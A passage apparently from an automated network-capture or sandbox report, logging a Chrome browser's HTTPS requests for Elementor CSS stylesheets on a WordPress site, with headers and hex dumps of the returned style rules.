                                                                                                          2024-12-12 11:58:06 UTC2744INData Raw: 6e 74 65 6e 74 3a 27 5c 65 39 37 39 27 7d 2e 65 69 63 6f 6e 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 61 27 7d 2e 65 69 63 6f 6e 2d 67 6c 6f 62 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 62 27 7d 2e 65 69 63 6f 6e 2d 74 79 70 6f 67 72 61 70 68 79 2d 31 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 63 27 7d 2e 65 69 63 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 64 27 7d 2e 65 69 63 6f 6e 2d 64 65 76 69 63 65 2d 72 65 73 70 6f 6e 73 69 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 65 27 7d 2e 65 69 63 6f 6e 2d 64 65 76 69 63 65 2d 77 69 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                                                                          Data Ascii: ntent:'\e979'}.eicon-global-colors:before{content:'\e97a'}.eicon-globe:before{content:'\e97b'}.eicon-typography-1:before{content:'\e97c'}.eicon-background:before{content:'\e97d'}.eicon-device-responsive:before{content:'\e97e'}.eicon-device-wide:before{con


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.2449793147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:06 UTC602OUTGET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:06 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:06 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 157372
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 36 2e 31 20 2d 20 32 33 2d 30 33 2d 32 30 32 32 20 2a 2f 0a 2e 64 69 61 6c 6f 67 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 32 70 78 20 38 70 78 20 32 33 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 32 70 78 20 38 70 78 20 32 33 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 64 69 61 6c 6f 67 2d 6d 65 73 73 61 67 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                          Data Ascii: /*! elementor - v3.6.1 - 23-03-2022 */.dialog-widget-content{background-color:#fff;position:absolute;border-radius:3px;-webkit-box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 74 69 66 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 31 30 30 25 7d 7d 3a 72 6f 6f 74 7b 2d 2d 70 61 67 65 2d 74 69 74 6c 65 2d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 74 69 74 6c 65 2c 68 31 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 70 61 67 65 2d 74 69 74 6c 65 2d 64 69 73 70 6c 61 79 29 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 65 69 63 6f 6e 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33
                                                                                                          Data Ascii: tify .elementor-button{width:100%}}:root{--page-title-display:block}.elementor-page-title,h1.entry-title{display:var(--page-title-display)}@-webkit-keyframes eicon-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(3
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 74 61 62 6c 65 74 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 39 29 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 74 61 62 6c 65 74 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 31 30 29 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 69 6e 69 74 69 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 69 6e 69 74 69 61 6c 3b 6f 72 64 65 72 3a 30 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 6d 6f 62 69 6c 65 5f 65 78 74 72 61 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 2d 77 65 62 6b 69 74
                                                                                                          Data Ascii: ntor-reverse-tablet>.elementor-container>:nth-child(9),.elementor-reverse-tablet>.elementor-container>:nth-child(10){-webkit-box-ordinal-group:initial;-ms-flex-order:initial;order:0}.elementor-reverse-mobile_extra>.elementor-container>:first-child{-webkit
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 2d 6f 76 65 72 6c 61 79 2d 74 72 61 6e 73 69 74 69 6f 6e 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 29 7d 2e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 67 6f 6f 67 6c 65 5f 6d 61 70 73 2c 2e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 76 69 64 65 6f 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 7d 2e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d
                                                                                                          Data Ascii: -overlay-transition);border-radius:var(--border-radius)}.e-container .elementor-widget{min-width:0}.e-container .elementor-widget-google_maps,.e-container .elementor-widget-video{-ms-flex-preferred-size:100%;flex-basis:100%}.e-container .elementor-widget-
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 6c 67 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 35 39 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 66 6f 72 6d 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 78 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 37 32 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 62 6f 72 64 65 72 20 2e 33 73 2c 62 6f 72 64 65 72 2d 72 61 64 69 75 73 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e
                                                                                                          Data Ascii: mentor-size-lg{min-height:59px}.elementor-form .elementor-button.elementor-size-xl{min-height:72px}.elementor-element .elementor-widget-container{-webkit-transition:background .3s,border .3s,border-radius .3s,-webkit-box-shadow .3s;transition:background .
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 6f 6e 74 61 69 6e 7d 2e 73 77 69 70 65 72 2d 73 63 72 6f 6c 6c 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69 70 65 72 2d 73 63 72 6f 6c 6c 62 61 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 31 25 3b 62 6f 74 74 6f 6d 3a 33 70 78 3b 7a 2d 69 6e 64 65 78 3a 35 30 3b 68 65 69 67 68 74 3a 35 70 78 3b 77 69 64 74 68 3a 39 38 25 7d 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 76 65 72 74 69 63 61 6c 3e 2e 73
                                                                                                          Data Ascii: ontain}.swiper-scrollbar{border-radius:10px;position:relative;-ms-touch-action:none;background:rgba(0,0,0,.1)}.swiper-container-horizontal>.swiper-scrollbar{position:absolute;left:1%;bottom:3px;z-index:50;height:5px;width:98%}.swiper-container-vertical>.s
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 6f 72 2d 77 69 64 67 65 74 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 73 2e 65 2d 67 72 69 64 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 2d 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 76 61 72 28 2d 2d 66 6c 65 78 2d 72 69 67 68 74 2c 66 6c 65 78 2d 65 6e 64 29 7d 2e 65 2d 2d 75 61 2d 61 70 70 6c 65 57 65 62 6b 69 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 68 61 72 65 2d 62 75 74 74 6f 6e 73 2d 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 2c 2e 65 2d 2d 75 61 2d 61 70 70 6c 65 57 65 62 6b 69 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 73 2e 65 2d 67 72 69 64 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 2d 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 65 2d 2d 75 61 2d 61 70 70 6c 65 57 65 62
                                                                                                          Data Ascii: or-widget-social-icons.e-grid-align-right{--justify-content:var(--flex-right,flex-end)}.e--ua-appleWebkit .elementor-share-buttons--align-center,.e--ua-appleWebkit .elementor-widget-social-icons.e-grid-align-center{--justify-content:center}.e--ua-appleWeb
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 69 6d 67 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 2e 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 3a 30 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 20 66 69 67 75 72 65 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 20
                                                                                                          Data Ascii: ertical-align:top;width:100%;max-width:100%;margin:0 auto}.elementor-image-gallery .gallery-item img{margin:0 auto}.elementor-image-gallery .gallery-item .gallery-caption{margin:0}.elementor-image-gallery figure img{display:block}.elementor-image-gallery
                                                                                                          2024-12-12 11:58:07 UTC16384INData Raw: 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 73 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 73 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 3a 61 66 74 65 72 7b 77 69 64 74 68 3a 61 75 74 6f 3b 6c 65 66 74 3a 61 75 74 6f 3b 72 69 67 68 74 3a 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 72 69 67 68 74 3a 2d 38 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 2e
                                                                                                          Data Ascii: mentor-icon-list-items.elementor-inline-items .elementor-icon-list-item:after{width:auto;left:auto;right:auto;position:relative;height:100%;border-top:0;border-bottom:0;border-right:0;border-left-width:1px;border-style:solid;right:-8px}.elementor-widget .
                                                                                                          2024-12-12 11:58:07 UTC9916INData Raw: 6f 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 74 61 72 2d 72 61 74 69 6e 67 2d 74 61 62 6c 65 74 2d 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 74 61 72 2d 72 61 74 69 6e 67 5f 5f 77 72 61 70 70 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 74 61 72 2d 72 61 74 69 6e 67 2d 74 61 62 6c 65 74 2d 2d 61
                                                                                                          Data Ascii: ox-pack:start;-ms-flex-pack:start;justify-content:flex-start}.elementor-star-rating-tablet--align-center .elementor-star-rating__wrapper{text-align:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.elementor-star-rating-tablet--a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.2449794147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:07 UTC596OUTGET /wp-content/uploads/elementor/css/post-403.css?ver=1709081757 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:07 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:07 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 28 Feb 2024 00:55:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1182
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:07 UTC1182INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 34 30 33 7b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 3a 23 39 37 44 31 44 43 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 3a 23 35 34 35 39 35 46 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 74 65 78 74 3a 23 37 41 37 41 37 41 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 3a 23 36 31 43 45 37 30 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 52 6f 62 6f 74 6f 22 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 2d 2d 65 2d 67 6c 6f 62 61
                                                                                                          Data Ascii: .elementor-kit-403{--e-global-color-primary:#97D1DC;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-globa


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.2449795147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:07 UTC606OUTGET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.6.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:08 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:07 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:29:43 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 441967
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 36 2e 34 20 2d 20 31 35 2d 30 33 2d 32 30 32 32 20 2a 2f 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 7b 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 74 72 61 6e 73 66 6f 72 6d 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 2d 7a 6f 6f 6d 2d 69 6e 3a 68 6f 76 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 2d 7a 6f 6f 6d 2d 6f 75 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 32 29 3b 2d 6d 73 2d 74 72 61
                                                                                                          Data Ascii: /*! elementor-pro - v3.6.4 - 15-03-2022 */@charset "UTF-8";.elementor-bg-transform .elementor-bg{will-change:transform}.elementor-bg-transform-zoom-in:hover .elementor-bg,.elementor-bg-transform-zoom-out .elementor-bg{-webkit-transform:scale(1.2);-ms-tra
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 3e 2a 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 63 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 3e 2a 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77
                                                                                                          Data Ascii: rt.elementor-add-to-cart--layout-stacked .e-atc-qty-button-holder>*,.woocommerce div.product.elementor .elementor-widget-wc-add-to-cart.elementor-add-to-cart--layout-stacked .e-atc-qty-button-holder>*,.woocommerce div.product.elementor .elementor-widget-w
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 6e 2d 68 6f 6c 64 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 77 69 64 65 73 63 72 65 65 6e 2d 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 22 5d 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 65 6e 64 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64
                                                                                                          Data Ascii: n-holder,.woocommerce div.product.elementor .elementor-widget-woocommerce-product-add-to-cart.elementor-add-to-cart-widescreen--align-right[class*="--layout-stacked"] .e-atc-qty-button-holder{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 22 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 61 75 74 6f 22 5d 29 20 66 6f 72 6d 2e 63 61 72 74 3a 6e 6f 74 28 2e 67 72 6f 75 70 65 64 5f 66 6f 72 6d 29 3a 6e 6f 74 28 2e 76 61 72 69 61 74 69 6f 6e 73 5f 66 6f 72 6d 29 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 63 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 74 61 62 6c 65 74 5f 65 78 74 72 61 2d 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 61 75 74 6f 22 5d 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67
                                                                                                          Data Ascii: ([class*="--layout-stacked"]):not([class*="--layout-auto"]) form.cart:not(.grouped_form):not(.variations_form),.elementor-widget-wc-add-to-cart.elementor-add-to-cart-tablet_extra--align-left[class*="--layout-auto"] .e-atc-qty-button-holder,.elementor-widg
